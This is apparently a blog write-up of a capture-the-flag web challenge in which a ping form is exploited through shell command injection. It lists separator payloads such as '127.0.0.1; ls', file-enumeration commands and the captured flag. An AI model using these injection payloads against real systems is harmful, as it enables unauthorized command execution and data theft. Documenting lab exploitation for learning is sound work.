155 words
1 minutes
SCSC2026 Quals - Network Looking Glass - Web Exploitation Writeup
Category: Web Exploitation
URL: https://ctf.sriwijayasecuritysociety.com/
Flag: SCSC26{p1nG_p1nG_bU4t_NyUsUp_m4sUk}
Challenge Description
The challenge provided a web-based “Network Looking Glass” interface that lets users ping hosts. This kind of feature often becomes dangerous if user input is concatenated directly into a shell command.
Analysis
The page accepted a hostname/IP and returned the output of ping. That strongly indicates something like:
system("ping -c 1 " . $_GET["host"]);If the input is not sanitized, we can try classic command injection separators such as ;, &&, ||, |, $(), and backticks.
Payloads I tested:
127.0.0.1; ls
127.0.0.1 && ls
127.0.0.1 | ls
127.0.0.1; `ls`The semicolon (;) worked, confirming command injection.
Exploitation
After confirming injection, I enumerated for flag files and then read it:
127.0.0.1; ls -la
127.0.0.1; find / -name "flag*" 2>/dev/null
127.0.0.1; cat flag.txtThe output included the flag:
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.012 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.012/0.012/0.012/0.000 ms
SCSC26{p1nG_p1nG_bU4t_NyUsUp_m4sUk} SCSC2026 Quals - Network Looking Glass - Web Exploitation Writeup
https://blog.rei.my.id/posts/23/scsc2026-quals-network-looking-glass-web-exploitation-writeup/